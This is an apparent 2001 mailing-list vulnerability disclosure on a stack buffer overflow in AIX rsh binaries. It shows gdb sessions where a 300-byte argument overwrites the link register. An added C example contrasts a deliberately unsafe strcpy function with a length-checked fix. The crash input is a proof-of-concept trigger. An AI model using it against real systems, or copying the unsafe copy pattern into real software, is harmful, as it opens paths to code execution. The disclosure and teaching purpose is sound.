From: ox (ymciss.com.tw)
Date: Mon Jun 11 2001 - 22:40:20 CDT


    Hello bugtraq,

        I am sorry if this problem has been found before. What I found is a buffer overflow in both /usr/bin/rsh and /usr/lpp/ssp/rcmd/bin/rsh.


    1. Version description

    % oslevel
    4.2.0.0

    % uname -a
    AIX iss_tw 2 4 000342955700

    2. Problem found

    /*********************************************************************************************************************/
    /* /usr/lpp/ssp/rcmd/bin/rsh problem */
    /* we can easily overflow LR, the register AIX uses to return from a call */
    /*********************************************************************************************************************/
    % /usr/local/bin/gdb /usr/lpp/ssp/rcmd/bin/rsh
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) set args `perl -e 'print "A" x 300'` a
    (gdb) r
    Starting program: /usr/lpp/ssp/rcmd/bin/rsh `perl -e 'print "A" x 300'` a
    (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x61616160 in ?? () from (unknown load module)
    (gdb) info register lr
    lr 0x61616161 1633771873
    (gdb)
    /*********************************************************************************************************************/

    The other is:

    /*********************************************************************************************************************/
    /* /usr/bin/rsh problem */
    /*********************************************************************************************************************/
    % /usr/local/bin/gdb /usr/bin/rsh
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) set args `perl -e 'print "A" x 300'` a
    (gdb) r
    Starting program: /usr/bin/rsh `perl -e 'print "A" x 300'` a
    (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x61616160 in ?? () from (unknown load module)
    (gdb) info register lr
    lr 0x61616161 1633771873
    (gdb)
    /*********************************************************************************************************************/


    Sincerely yours,


    --
    Yu-Min Chang
    ymciss.com.tw
    R&D Team, ISS-TW (Internet Security Solutions, Taiwan)
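The post shows only the crash: a 300-byte first argument ends up in the link register, so the saved return address in a stack frame was overwritten by argument bytes. The following C is an added example, not code from the original post and not the AIX rsh source (which is not on the page). It is a constructed model of the bug class: a fixed-size host-name buffer filled from argv[1] without a bound check, beside a hardened version that refuses an argument that does not fit. The buffer size HOST_MAX, the function names and the sample host name are assumptions made for the example.

```c
/*
 * Added example (not from the original post or from AIX rsh): a constructed
 * model of an argv[1] stack overflow of the kind the gdb sessions above show,
 * next to a length-checked version.  HOST_MAX is an assumed size, not a
 * value taken from rsh.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 64 /* assumed buffer size for the host argument */

/*
 * Vulnerable pattern.  strcpy() stops only at the NUL, so an argument of
 * HOST_MAX bytes or more runs past `host` into the rest of the stack frame.
 * On PowerPC/AIX the link register (LR) is saved in the frame's linkage area,
 * so the overwritten slot is reloaded into LR on return and the CPU branches
 * to attacker-chosen bytes, which is what "lr 0x61616161" in the post shows.
 * Only called with short input here; a 300-byte argument would crash it.
 */
static int parse_host_unsafe(const char *arg)
{
    char host[HOST_MAX];
    strcpy(host, arg);            /* no bound check: the bug */
    return (int)strlen(host);
}

/*
 * Hardened form: measure first, reject anything that does not fit including
 * the terminating NUL, then copy exactly what was measured.
 * Returns 0 on success, -1 if `arg` is too long for `out`.
 */
static int parse_host_safe(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    if (outsz == 0 || n >= outsz)
        return -1;
    memcpy(out, arg, n + 1);      /* n + 1 <= outsz is guaranteed above */
    return 0;
}

/* Builds the same kind of argument as `perl -e 'print "A" x 300'`. Caller frees. */
static char *make_filler(char c, size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, (unsigned char)c, len);
    s[len] = '\0';
    return s;
}

/* Self-check: returns the number of failed expectations (0 = all good). */
static int run_checks(void)
{
    int failures = 0;
    char out[HOST_MAX];
    char *big = make_filler('A', 300);

    if (big == NULL || strlen(big) != 300)
        failures++;
    /* the over-long argument must be rejected, not copied */
    if (big != NULL && parse_host_safe(big, out, sizeof out) != -1)
        failures++;
    /* a normal host name (constructed sample) is accepted unchanged */
    if (parse_host_safe("iss_tw", out, sizeof out) != 0 || strcmp(out, "iss_tw") != 0)
        failures++;
    /* the unsafe version behaves the same on input that fits */
    if (parse_host_unsafe("iss_tw") != 6)
        failures++;
    /* boundary: exactly HOST_MAX-1 bytes fits, HOST_MAX bytes does not */
    char *edge = make_filler('h', HOST_MAX - 1);
    if (edge == NULL || parse_host_safe(edge, out, sizeof out) != 0)
        failures++;
    char *over = make_filler('h', HOST_MAX);
    if (over == NULL || parse_host_safe(over, out, sizeof out) != -1)
        failures++;

    free(big);
    free(edge);
    free(over);
    return failures;
}

int main(int argc, char **argv)
{
    char host[HOST_MAX];
    const char *arg = argc > 1 ? argv[1] : "localhost";

    if (parse_host_safe(arg, host, sizeof host) != 0) {
        fprintf(stderr, "host name too long (%zu bytes, max %d)\n",
                strlen(arg), HOST_MAX - 1);
        return 2;
    }
    printf("host: %s\n", host);
    return run_checks() == 0 ? 0 : 1;
}
```

Run it as `./a.out "$(perl -e 'print "A" x 300')"` to see the hardened path reject the same input that crashed rsh in the post; the unsafe function is kept only as the "before" picture and is never fed the long argument here.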